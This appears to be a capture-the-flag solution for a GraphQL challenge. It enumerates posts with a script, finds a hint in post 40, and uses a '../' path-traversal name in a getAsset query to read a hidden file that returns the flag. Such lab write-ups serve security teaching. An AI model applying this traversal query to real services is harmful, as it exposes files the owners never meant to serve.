************ Using scriptGetEachPost.py :

------------ WITH :

{
	post(id:40){
    title,
    content,
    author{
      username,
      firstName,
      lastName
    }
  }
}

------------ WE OBTAIN :

{
  "data": {
    "post": {
      "title": "Personal notes",
      "content": "Remember to delete the ../mysecretmemofile asset.",
      "author": {
        "username": "Rosie_Hermiston30",
        "firstName": "Darrion",
        "lastName": "Gusikowski"
      }
    }
  }
}

------------ THEN :

{
	getAsset(name:"../mysecretmemofile")
}

------------ And result :

{
  "data": {
    "getAsset": "{FLG:st4rt0ffwith4b4ng!}\n"
  }
}